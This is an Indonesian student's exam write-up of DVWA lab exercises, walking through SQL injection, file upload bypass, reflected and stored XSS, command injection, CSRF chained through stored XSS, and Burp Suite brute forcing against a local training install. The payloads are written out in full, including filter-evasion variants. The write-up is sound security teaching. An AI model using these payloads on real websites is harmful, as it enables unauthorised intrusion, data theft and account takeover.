Anda di halaman 1dari 21

TUGAS UAS Keamanan Jaringan

“LANGKAH – LANGKAH
DVWA”

Fachrully Rahman
1711082049
TRPL 3A

POLITEKNIK NEGERI PADANG


Tahun Ajaran 2019/2018
1. SQL Injecion | Low

Insert / masukkan %' or '0'='0 pada sql injection.

Maka Keluar

ID: %' or '0'='0


First name: admin
Surname: admin
ID: %' or '0'='0
First name: Gordon
Surname: Brown
ID: %' or '0'='0
First name: Hack
Surname: Me
ID: %' or '0'='0
First name: Pablo
Surname: Picasso
ID: %' or '0'='0
First name: Bob
Surname: Smith

2. Medium

Ubah dvwa security menjadi ‘Medium ‘ lalu buka SQL Injection lalu Buka Inspect Elemen pada web
browser lalu select element hinnga keluar inspect Menu / (ctrl + shift + I pada google)

Lalu pada column value tukar nilai value menjadi 1 or 1 = 1 lalu enter dan
submit pada DVWA

Lalu Output akan menjadi seperti ini

ID: 1 or 1 = 1
First name: admin
Surname: admin
ID: 1 or 1 = 1
First name: Gordon
Surname: Brown
ID: 1 or 1 = 1
First name: Hack
Surname: Me
ID: 1 or 1 = 1
First name: Pablo
Surname: Picasso
ID: 1 or 1 = 1
First name: Bob
Surname: Smith

2. File Upload |
Pada DVWA security ubah kembali menjadi medium

Lalu Pilih Menu File Upload


Lalu Buat File PHP nama terserah dengan Isi ECHO “ NAMA DAN BP“

Lalu Upload Pada DVWA


Dan Keluarkan Pada OUTPUT : “http://localhost:8081/dvwa/hackable/uploads/file_upload.php”

2. File Upload | medium

Untuk file upload medium Harus Berenteksi JPEG | PNG

Maka untuk medium file_upload.php diganti menjadi file_upload.php.jpeg


Lalu keluarkan Pada OUTPUT : “http://localhost:8081/dvwa/hackable/uploads/file_upload.php”

3. Xss Reflected | Low

Ubah DVWA Security kembali menjadi LOW lalu

lalu pada menu DVWA / xss (reflected) Input

<h4> Fachhrully Rahman//1711082049//<h4>

Lalu keluar Output

Hello
Fachhrully Rahman//1711082049//

3 Xss Reflected | Medium


Ubah DVWA Security Kembali Menjadi Medium, lalu input alert('xss reflected')</script>

Untuk Menjadi ALERT maka alert('xss reflected')</script>diubah menjadi <scRIpt>alert('12345')</script>


dan keluar output seperti gambar dibawah
4. Xss stored | Low

Ubah DVWA security menjadi low lalu pilih menu xss stored pada menu xss stored sendiri ada 2 Form
Input name dan messege isi Name dengan = “Fachrully ” dan Messege <script>alert('ALERT!!')</script>

Pada bagian messege kosong dikarenakan Jenis messege menggunakan Script dari php jika
menggunakan script dari HTML dengan comment <b> Fachrully <b>

Pada XSS STORED akan keluar pada DATABASE pada table guestbook dengan isi sebagai berikut

4. Xss stored | Medium

Ubah DVWA security menjadi medium, lalu masuk ke dalam XXs stored pada bagian xss stored terdapat
menu name dan messege, pada bagian name kita ubah length untuk value nya dengan inspect elemen /
ctrl + shift + I ubah maxlenght value = “90”
lalu pada bagian nama diisi

<SCript>alert('ALERT!! YOURE WRONG PLEASE BACK!!!')</SCript>

lalu data akan di stored pada database


5.Command Injection | Low

ubah DVWA security menjadi low lalu masuk ke dalam Command injection lagi masukkan IP sesuai
dengan ip yang telah ditentukan pada config DVWA pada config DVWA saya yaitu 127.0.0.1 dengan port
8081. Untuk input command injection saya memasukkan perintah (“ip” & dir) untuk melihat directory
attribute pada ip tersebut

input :127.0.0.1 & dir

Output

Command injection | Medium

ubah security pada DVWA menjadi medium lalu masuk ke dalam menu Command Injection lalu ketikkan

| dir / | dir/../.. untuk bisa mengakses dan melihat data yang terdapat pada directory yang ditempati

input form | dir


6. CSRF | Low

ubah DVWA security menjadi low kembali, masuk ke dalam menu CSRF dan view page source pada
halaman CSRF low / ctrl + u (View Page Source)
Lalu copy kan body-padded ke dalam note application

Sehingga PHP untuk FORM tujuan nnti siap


ketika nanti user yang menekan download button akan langsung di direct ke menu CSRF pada DVWA
dan password akan terubah sesuai dengan value yang telah di script kan pada body_csrf.php jika new
password nantinya adalah 9999 maka password user akan langsung tereset ke value : 9999.

CSRF | Medium
ubah DVWA security menjadi Medium dan pergi menuju csrf menu tukar password anda menjadi
dengan 9999

dan kemudian copy kan url dari CSRF

http://localhost:8081/dvwa/vulnerabilities/csrf/?password_new=9999&password_conf=9999&Change=
Change#

lalu ubah url menjadi

http://localhost:8081/dvwa/vulnerabilities/csrf/?password_new=1234&password_conf=1234&Change=
Change#

Lalu masuk ke dalam menu xss stored dan copykan

<img src=”/dvwa/vulnerabilities/csrf/?password_new=1234&password_conf=1234&Change=Change#”>

Jangan lupa ubah maxlength menjadi dengan = “90” dan copy kan url tadi.

dan comment terserah kemuan user.


7.Brute Attacks | Low

Ubah security DVWA menjadi low, lalu setting

1. Burp Suite Instal Terlebih dahulu lalu setting pada proxy intruders menjadi off lalu klik pada bagian
proxy option lalu setting ip menjadi 127.0.0.1 dan port 8090
2. setting foxy proxy
instal foxy proxy pada Mozilla anda lalu edit proxy lalu save

Lalu pergi ke brute force lalu isikan dengan password yang salah
Lalu proxy klik pada http history lalu cari pada localhost:8081 dengan method get lalu lihat yang berisi
sama dengan username dan password yang telah kita isikan sebelumnya

GET /dvwa/vulnerabilities/brute/?username=admin&password=9999&Login=Login HTTP/1.1


Host: localhost:8081
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: id,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://localhost:8081/dvwa/vulnerabilities/brute/
Cookie: security=low; PHPSESSID=fqqkaa647kiq1243hrevt7ji3o
Upgrade-Insecure-Requests: 1

Lalu klik kanan pada proxy tadi lalu kirimkan kepada intruders lalu pada position ubah jadi cluster bom
lalu hilangkan symbol ($) pada login dan cookie
Lalu payload set 1 di load dengan 1 = username
Lalu payload set 2 di load dengan 2 = password
lalu mulai / start attack

Pada bagian result terdapat request dengan payload 1 dan 2 sebagai id dan password DVWA yang salah
dan benar sebelumnya lengt yang benar akan menunjukan username dan password yang berbeda dari
length yang lain.
jika benar kita bisa liat pada response lalu render lalu keluar output sebagai berikut

Brute Force | Medium


Pada brute force medium sama dengan yang low tetapi jika sebelumnya kita menghilangkan
meghilangkan symbol $ disini kita cukup menambahkan $ pada attribut pada login yang ada
GET /dvwa/vulnerabilities/brute/?username=$admin$&password=$admin$&Login=$Login$ HTTP/1.1
Host: localhost:8081
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://localhost/dvwa/vulnerabilities/brute/
Cookie: security=$low$; PHPSESSID=$qg7ka6jul605mi7hhbbc8vdknj$
Upgrade-Insecure-Requests: 1

Anda mungkin juga menyukai